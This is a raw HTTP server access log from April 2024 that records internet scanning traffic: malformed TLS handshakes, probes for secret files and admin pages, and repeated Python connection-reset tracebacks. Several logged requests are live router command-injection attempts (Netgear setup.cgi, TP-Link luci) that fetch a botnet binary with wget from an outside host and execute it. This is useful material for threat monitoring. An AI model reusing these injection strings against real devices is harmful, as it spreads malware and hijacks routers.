fuà\x0fr\x1br¤\x872\x1f3äd|\x8bÁã%A®¾\x00\x15"EE)\x8eù\x02­\x00\x8cÚÚÀ\x12À\x13À\x07À'Ì\x14À/\x13\x01À\x14\x13\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ­Ì¨À$\x13\x05À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:57] code 400, message Bad request version ('À\\x13À') 43.163.232.152 - - [25/Apr/2024 11:25:57] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03\x05V\x10´\x96*q:ØO8 ÐC\x84àÀØ!\x11ï"¶ÀiX¿\x93³÷\x08Ê ¡Ð9ìV¢³ùö°W\x901'\x80wí\x1e\x03\x80a\x81\x14\x0e&\x0dX(Õåâ\x0f\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:57] code 400, message Bad request version ('À#À¬À®À+À') 43.163.232.152 - - [25/Apr/2024 11:25:57] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03\x89Äõ\x0d\x82\x1eÏNéK© ÞG3>\x9bÊ·?\x9c8k[J\x99'ÌeÇ÷é À×3\x8exþX\x1e'^x&oá\x09·uâE\x97/E&gd Ú&%â\x80ë\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:58] code 400, message Bad request version ('À\\x9c\\x00<\\x00/\\x00') 43.163.232.152 - - [25/Apr/2024 11:25:58] "\x16\x03\x03\x01¨\x01\x00\x01¤\x03\x03SR^¿Öú \x8a\x87\x18*O¾\x7f­ÏQä¾i\x9e®\x0b\x99L\x09Àq\x124uc æÌ\x14\x09ÌçË*ë1:\x7fQæ7a\x80\x19\x16HÁB/\x9fX°½ùÓ¬{\x9f\x00\x8a\x00\x05\x00\x04\x00\x07\x00À\x00\x84\x00º\x00A\x00\x9dÀ¡À\x9d\x00=\x005\x00\x9cÀ À\x9c\x00<\x00/\x00" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:58] code 400, message Bad HTTP/0.9 request type ("\\x16\\x03\\x03\\x01Y\\x01\\x00\\x01U\\x03\\x03fQ\\x01ß$©mi¼m!9¢,>RÒÉÆo¹²v¹ä\\x89BÓa\\x14'\\x04") 43.163.232.152 - - [25/Apr/2024 11:25:58] "\x16\x03\x03\x01Y\x01\x00\x01U\x03\x03fQ\x01ß$©mi¼m!9¢,>RÒÉÆo¹²v¹ä\x89BÓa\x14'\x04 r`¨õ\x00¡'ó\x90*ë«XVÀïªàrØ\x8a4Êø¾\x8dÖ%\x8cuu\x00FÀ\x12À\x07Ì\x14\x13\x01\x13\x02Ì©ÀsÀrÀ,À¯À­À$À" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:59] code 400, message Bad request version ("¾\\x10¡\\x04T'«i\\x990Q\\x00DÀ\\x13À'À/À\\x14À(À0À`ÀaÀvÀw̨\\x13\\x05\\x13\\x04\\x13\\x03Ì\\x13À\\x11\\x00") 43.163.232.152 - - [25/Apr/2024 11:25:59] "\x16\x03\x03\x01K\x01\x00\x01G\x03\x03\x14z¹ø ¸\x8c«»`\x7fgoï2\x86è«I\x84\x07#q\x94M\x0fwÈT*yþ a@^\x042¼Ï\x0c\x9d\x12\x99\x95\x07âè\x8d\x84\x8bËâ\x85¾\x10¡\x04T'«i\x990Q\x00DÀ\x13À'À/À\x14À(À0À`ÀaÀvÀw̨\x13\x05\x13\x04\x13\x03Ì\x13À\x11\x00" 400 - 43.163.232.152 - - [25/Apr/2024 11:25:59] code 400, message Bad request version ("N-`Ö#®¯\\\\¬\\x19\\x8dFZâ\\x93À²Éjbrï¼UÁí\\\\\\x00\\x8czzÀ\\x12À\\x13À\\x07À'Ì\\x14À/\\x13\\x01À\\x14\\x13\\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ\\xad̨À$\\x13\\x05À") 43.163.232.152 - - [25/Apr/2024 11:25:59] "\x16\x03\x03\x01\x9c\x01\x00\x01\x98\x03\x03i\x89¡<¢ñÅá¤wÃ\x1a7\x1ek.«ÀC3\x98Ç\x18ù\x8a\x856\x0b}÷}Ò \x8f\x97\x15|\x1dN-`Ö#®¯\\¬\x19\x8dFZâ\x93À²Éjbrï¼UÁí\\\x00\x8czzÀ\x12À\x13À\x07À'Ì\x14À/\x13\x01À\x14\x13\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ­Ì¨À$\x13\x05À" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:00] code 400, message Bad request version ('À#À¬À®À+À') 43.163.232.152 - - [25/Apr/2024 11:26:00] "\x16\x03\x02\x01\x9d\x01\x00\x01\x99\x03\x02ÀÍxFê\x10³<ý\x13\x0fù\x9bزżYô)þè°K±O\x01Qqµ\x84! Æ&)U¶V\x17G:«ÒÊ\x88\x0fBª¿/x©\x9bïzóÌ÷2\x07Õã\x92Ü\x00\x8a\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:01] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x01ª\\x01\\x00\\x01¦\\x03\\x03ïô\\x0f') 43.163.232.152 - - [25/Apr/2024 11:26:01] "\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x03ïô\x0f" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:01] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x01ª\\x01\\x00\\x01¦\\x03\\x03wÚë&¹') 43.163.232.152 - - [25/Apr/2024 11:26:01] "\x16\x03\x01\x01ª\x01\x00\x01¦\x03\x03wÚë&¹\x0dߧ7w_.\x87m*\x97" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:02] code 400, message Bad request version ('À#À¬À®À+À') 43.163.232.152 - - [25/Apr/2024 11:26:02] "\x16\x03\x01\x01 \x01\x00\x01\x9c\x03\x03àÊÑ8Et\x0f\x9bÖ>/\x83b\x8d©öò©`ôéÑP5ÄüvFöV®ð \x18/$\x8b\x8dÚA°N\x01Þ\x84Ï\x10(¼ë÷\x03µhÁ¿´\x87Æ°Z\x9cÆH\x1b\x00\x80\x00\x16\x003\x00gÀ\x9eÀ¢\x00\x9e\x009\x00kÀ\x9fÀ£\x00\x9f\x00E\x00¾\x00\x88\x00Ä\x00\x9aÀ\x08À\x09À#À¬À®À+À" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:02] code 400, message Bad request version ("\\x00\\x8c**À\\x12À\\x13À\\x07À'Ì\\x14À/\\x13\\x01À\\x14\\x13\\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ\\xad̨À$\\x13\\x05À") 43.163.232.152 - - [25/Apr/2024 11:26:02] "\x16\x03\x01\x01·\x01\x00\x01³\x03\x03cùQñ\x81t¦°d7\x9e\x16r*\x8a\x825m/Ñ\x91\x80ßs\x8d\x16\x97\x87\x98@1´ \x03\x09®\x06¡E)\x89¢<Â\x8bø\\âåvn°8¤@\x81Ç\x96\x18\x1f_UìË\x0d\x00\x8c**À\x12À\x13À\x07À'Ì\x14À/\x13\x01À\x14\x13\x02À(Ì©À0ÀsÀ`ÀrÀaÀ,ÀvÀ¯ÀwÀ­Ì¨À$\x13\x05À" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:03] code 400, message Bad request version ('À\\x14À') 43.163.232.152 - - [25/Apr/2024 11:26:03] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x02Ge)\x16ÝF\x10­\x1cÅ/\x83\x0cA£_]49\x92\x98\x99²%¨\x06\x9cO÷\x8bV\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 43.163.232.152 - - [25/Apr/2024 11:26:04] code 400, message Bad request version ('×î\\x06\\x89') 43.163.232.152 - - [25/Apr/2024 11:26:04] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03^e\x9dæ¼úD¬_:§\x08\x04¾ÃÕ\x8e¦\x9d2EÛï(Ü\x91G\x06`\x9a:S k\x89\x0cÄ 3\x0dqÞ\x03ïÜ-\x08ôÜ\x09×î\x06\x89" 400 - 146.19.24.28 - - [25/Apr/2024 11:55:59] "GET / HTTP/1.1" 200 - 117.204.204.54 - - [25/Apr/2024 12:00:25] code 404, message File not found 117.204.204.54 - - [25/Apr/2024 12:00:25] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.204.204.54:44396/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - 45.142.182.92 - - [25/Apr/2024 12:00:33] code 404, message File not found 45.142.182.92 - - [25/Apr/2024 12:00:33] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.161.248.199 - - [25/Apr/2024 12:11:45] "GET / HTTP/1.1" 200 - 185.16.38.111 - - [25/Apr/2024 12:31:57] "GET / HTTP/1.1" 200 - 118.193.72.187 - - [25/Apr/2024 13:15:01] code 400, message Bad request version ('\\x00\\x9ę̪\\x003\\x00=\\x00\\x16À') 118.193.72.187 - - [25/Apr/2024 13:15:01] "\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03Ñð\x84$\x99øv½\x89'P\x1d½²IA©Q\x1bkïî׫â\x8b\x05\x05&ò{ê \x95È+\x85}6@û`¡xZëO[4ùY¢\\9´«*[\x7fjÐëäi\x1e\x004̨̩À/À0À+À,À\x09\x00\x9ę̪\x003\x00=\x00\x16À" 400 - 118.193.72.187 - - [25/Apr/2024 13:15:12] "GET / HTTP/1.1" 200 - 118.193.72.187 - - [25/Apr/2024 13:15:12] code 404, message File not found 118.193.72.187 - - [25/Apr/2024 13:15:12] "GET /favicon.ico HTTP/1.1" 404 - 118.193.72.187 - - [25/Apr/2024 13:15:13] code 404, message File not found 118.193.72.187 - - [25/Apr/2024 13:15:13] "GET /robots.txt HTTP/1.1" 404 - 118.193.72.187 - - [25/Apr/2024 13:15:14] code 404, message File not found 118.193.72.187 - - [25/Apr/2024 13:15:14] "GET /sitemap.xml HTTP/1.1" 404 - 118.193.72.187 - - [25/Apr/2024 13:15:14] "GET / HTTP/1.1" 200 - 118.193.72.187 - - [25/Apr/2024 13:15:15] "GET /images/ HTTP/1.1" 200 - 80.66.83.49 - - [25/Apr/2024 13:22:13] code 400, message Bad request syntax ('\\x04\\x01\\x00PPBS1\\x00') 80.66.83.49 - - [25/Apr/2024 13:22:13] "\x04\x01\x00PPBS1\x00" 400 - 80.66.83.49 - - [25/Apr/2024 13:23:14] code 400, message Bad request syntax ('\\x05\\x01\\x00') 80.66.83.49 - - [25/Apr/2024 13:23:14] "\x05\x01\x00" 400 - 80.66.83.49 - - [25/Apr/2024 13:23:14] code 501, message Unsupported method ('CONNECT') 80.66.83.49 - - [25/Apr/2024 13:23:14] "CONNECT 80.66.83.49:80 HTTP/1.1" 501 - 171.8.153.179 - - [25/Apr/2024 14:05:00] "GET / HTTP/1.1" 200 - 65.49.1.96 - - [25/Apr/2024 15:14:47] "GET / HTTP/1.1" 200 - 65.49.1.102 - - [25/Apr/2024 15:17:45] code 404, message File not found 65.49.1.102 - - [25/Apr/2024 15:17:45] "GET /favicon.ico HTTP/1.1" 404 - 65.49.1.102 - - [25/Apr/2024 15:18:24] code 404, message File not found 65.49.1.102 - - [25/Apr/2024 15:18:24] "GET /geoserver/web/ HTTP/1.1" 404 - 198.235.24.26 - - [25/Apr/2024 15:41:12] code 400, message Bad request version ('À\\x13À') 198.235.24.26 - - [25/Apr/2024 15:41:12] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03lÑêíÅ\x1b Î\x9c¬\x11ó\x83\x02\x04\x957\x1bü¾Q1\x90\x06\x86\x1d\x0d\\`txB wÁX0\x99ð\x913\x9a\x9fÙ?\x18 rj N\x9fî\x85\x04å\x8f\x9bæ\x99Ü"¿H\x15\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.26 - - [25/Apr/2024 15:41:12] code 400, message Bad HTTP/0.9 request type ("\\x16\\x03\\x01\\x00Ê\\x01\\x00\\x00Æ\\x03\\x03qÜ+{i\\x0e-T\\x84oáhºj]f¿b\\x08Ö®à¤G]sªî\\x9d!\\x10c\\x00\\x00hÌ\\x14Ì\\x13À/À+À0À,À\\x11À\\x07À'À#À\\x13À") 198.235.24.26 - - [25/Apr/2024 15:41:12] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03qÜ+{i\x0e-T\x84oáhºj]f¿b\x08Ö®à¤G]sªî\x9d!\x10c\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 185.224.128.43 - - [25/Apr/2024 15:49:00] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [25/Apr/2024 16:47:22] code 501, message Unsupported method ('POST') 80.94.92.60 - - [25/Apr/2024 16:47:22] "POST /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1 HTTP/1.1" 501 - 207.90.244.5 - - [25/Apr/2024 16:56:59] "GET / HTTP/1.1" 200 - 207.90.244.5 - - [25/Apr/2024 16:56:59] code 404, message File not found 207.90.244.5 - - [25/Apr/2024 16:56:59] "GET /robots.txt HTTP/1.1" 404 - 207.90.244.5 - - [25/Apr/2024 16:57:00] code 404, message File not found 207.90.244.5 - - [25/Apr/2024 16:57:00] "GET /sitemap.xml HTTP/1.1" 404 - 207.90.244.5 - - [25/Apr/2024 16:57:00] code 404, message File not found 207.90.244.5 - - [25/Apr/2024 16:57:00] "GET /.well-known/security.txt HTTP/1.1" 404 - 207.90.244.5 - - [25/Apr/2024 16:57:01] code 404, message File not found 207.90.244.5 - - [25/Apr/2024 16:57:01] "GET /favicon.ico HTTP/1.1" 404 - 107.170.252.63 - - [25/Apr/2024 17:00:10] code 404, message File not found 107.170.252.63 - - [25/Apr/2024 17:00:10] "GET /actuator/health HTTP/1.1" 404 - 185.16.38.111 - - [25/Apr/2024 18:19:36] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [25/Apr/2024 18:57:17] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [25/Apr/2024 19:06:16] "GET / HTTP/1.1" 200 - 192.241.232.36 - - [25/Apr/2024 19:21:30] code 404, message File not found 192.241.232.36 - - [25/Apr/2024 19:21:30] "GET /portal/redlion HTTP/1.1" 404 - 193.118.53.58 - - [25/Apr/2024 19:24:44] "GET / HTTP/1.1" 200 - 193.118.53.58 - - [25/Apr/2024 19:24:45] code 404, message File not found 193.118.53.58 - - [25/Apr/2024 19:24:45] "GET /favicon.ico HTTP/1.1" 404 - 46.174.191.28 - - [25/Apr/2024 19:38:52] "GET / HTTP/1.0" 200 - 65.49.20.67 - - [25/Apr/2024 19:55:15] code 400, message Bad request version ('À\\x14À') 65.49.20.67 - - [25/Apr/2024 19:55:15] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Ù¢¨\x0e\x0d¶\x86\x9e³a]Ð3ô\x16e\x00Y5DË^"PÿF\x18hw{õ¶\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 123.58.213.118 - - [25/Apr/2024 20:18:11] "GET / HTTP/1.1" 200 - 123.58.213.118 - - [25/Apr/2024 20:18:12] code 404, message File not found 123.58.213.118 - - [25/Apr/2024 20:18:12] "GET /favicon.ico HTTP/1.1" 404 - 123.58.213.118 - - [25/Apr/2024 20:18:12] code 404, message File not found 123.58.213.118 - - [25/Apr/2024 20:18:12] code 404, message File not found 123.58.213.118 - - [25/Apr/2024 20:18:12] "GET /robots.txt HTTP/1.1" 404 - 123.58.213.118 - - [25/Apr/2024 20:18:12] "GET /sitemap.xml HTTP/1.1" 404 - 146.120.241.207 - - [25/Apr/2024 20:26:13] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [25/Apr/2024 20:36:13] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [25/Apr/2024 20:36:13] "CONNECT google.com:443 HTTP/1.1" 501 - 45.142.182.92 - - [25/Apr/2024 20:52:11] code 404, message File not found 45.142.182.92 - - [25/Apr/2024 20:52:11] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.224.128.43 - - [25/Apr/2024 20:52:13] "GET / HTTP/1.1" 200 - 80.244.11.33 - - [25/Apr/2024 21:45:25] code 404, message File not found 80.244.11.33 - - [25/Apr/2024 21:45:25] "GET /.env HTTP/1.1" 404 - 80.244.11.33 - - [25/Apr/2024 21:45:26] code 501, message Unsupported method ('POST') 80.244.11.33 - - [25/Apr/2024 21:45:26] "POST / HTTP/1.1" 501 - 194.165.16.76 - - [25/Apr/2024 21:48:43] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.165.16.76 - - [25/Apr/2024 21:48:43] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 89.190.156.243 - - [25/Apr/2024 21:55:18] code 501, message Unsupported method ('POST') 89.190.156.243 - - [25/Apr/2024 21:55:18] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 91.92.243.102 - - [25/Apr/2024 21:59:50] code 404, message File not found 91.92.243.102 - - [25/Apr/2024 21:59:50] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F91.92.243.102%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 - 194.50.16.190 - - [25/Apr/2024 22:08:17] "GET / HTTP/1.1" 200 - 51.254.59.113 - - [25/Apr/2024 22:13:32] "GET / HTTP/1.1" 200 - 51.254.59.113 - - [25/Apr/2024 22:13:33] "GET /images/ HTTP/1.1" 200 - 66.240.236.109 - - [25/Apr/2024 22:39:19] "GET / HTTP/1.1" 200 - 171.8.155.104 - - [25/Apr/2024 22:53:29] "GET / HTTP/1.1" 200 - 198.235.24.160 - - [25/Apr/2024 22:53:41] "GET / HTTP/1.1" 200 - 171.8.155.104 - - [25/Apr/2024 22:56:13] "GET / HTTP/1.1" 200 - 34.140.130.61 - - [25/Apr/2024 22:59:36] "GET / HTTP/1.1" 200 - 171.8.155.104 - - [25/Apr/2024 23:02:47] "GET / HTTP/1.1" 200 - 171.8.155.104 - - [25/Apr/2024 23:32:49] "GET / HTTP/1.1" 200 - 212.70.149.134 - - [25/Apr/2024 23:35:34] "GET / HTTP/1.0" 200 - 185.16.38.111 - - [26/Apr/2024 00:03:22] "GET / HTTP/1.1" 200 - 91.92.243.102 - - [26/Apr/2024 00:09:07] code 404, message File not found 91.92.243.102 - - [26/Apr/2024 00:09:07] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F91.92.243.102%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 - 91.92.240.49 - - [26/Apr/2024 00:13:11] code 404, message File not found 91.92.240.49 - - [26/Apr/2024 00:13:11] "GET /.git/config HTTP/1.1" 404 - 146.19.24.28 - - [26/Apr/2024 01:19:51] "GET / HTTP/1.1" 200 - 198.199.93.63 - - [26/Apr/2024 01:39:51] code 404, message File not found 198.199.93.63 - - [26/Apr/2024 01:39:51] "GET /druid/index.html HTTP/1.1" 404 - 192.241.231.42 - - [26/Apr/2024 01:54:06] code 404, message File not found 192.241.231.42 - - [26/Apr/2024 01:54:06] "GET /hudson HTTP/1.1" 404 - 3.101.230.189 - - [26/Apr/2024 01:56:27] "HEAD / HTTP/1.1" 200 - 185.224.128.43 - - [26/Apr/2024 01:59:58] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [26/Apr/2024 02:10:26] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [26/Apr/2024 02:10:26] "CONNECT google.com:443 HTTP/1.1" 501 - 107.170.248.23 - - [26/Apr/2024 02:17:28] code 404, message File not found 107.170.248.23 - - [26/Apr/2024 02:17:28] "GET /ReportServer HTTP/1.1" 404 - 80.94.92.60 - - [26/Apr/2024 02:22:13] "GET / HTTP/1.1" 200 - 3.101.230.151 - - [26/Apr/2024 02:25:48] "HEAD / HTTP/1.1" 200 - 3.101.230.186 - - [26/Apr/2024 02:44:53] "HEAD / HTTP/1.1" 200 - 3.101.230.186 - - [26/Apr/2024 02:45:55] "GET / HTTP/1.1" 200 - 3.101.230.186 - - [26/Apr/2024 02:45:56] code 404, message File not found 3.101.230.186 - - [26/Apr/2024 02:45:56] "GET /favicon.ico HTTP/1.1" 404 - 3.101.240.15 - - [26/Apr/2024 02:51:02] "HEAD / HTTP/1.1" 200 - 3.101.240.15 - - [26/Apr/2024 02:51:06] "GET / HTTP/1.1" 200 - 3.101.240.15 - - [26/Apr/2024 02:51:06] code 404, message File not found 3.101.240.15 - - [26/Apr/2024 02:51:06] "GET /favicon.ico HTTP/1.1" 404 - 205.210.31.161 - - [26/Apr/2024 04:25:22] "GET / HTTP/1.1" 200 - 3.101.240.169 - - [26/Apr/2024 04:48:09] "GET / HTTP/1.1" 200 - 45.142.182.92 - - [26/Apr/2024 04:58:57] code 404, message File not found 45.142.182.92 - - [26/Apr/2024 04:58:57] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 198.199.109.127 - - [26/Apr/2024 05:10:03] code 404, message File not found 198.199.109.127 - - [26/Apr/2024 05:10:03] "GET /manager/html HTTP/1.1" 404 - 45.128.232.229 - - [26/Apr/2024 05:12:26] "GET / HTTP/1.1" 200 - 195.9.112.6 - - [26/Apr/2024 05:35:45] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 15349) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 1507) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 38732) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 31732) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 59361) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 2284) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 14862) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 57741) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.240.151', 52468) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request 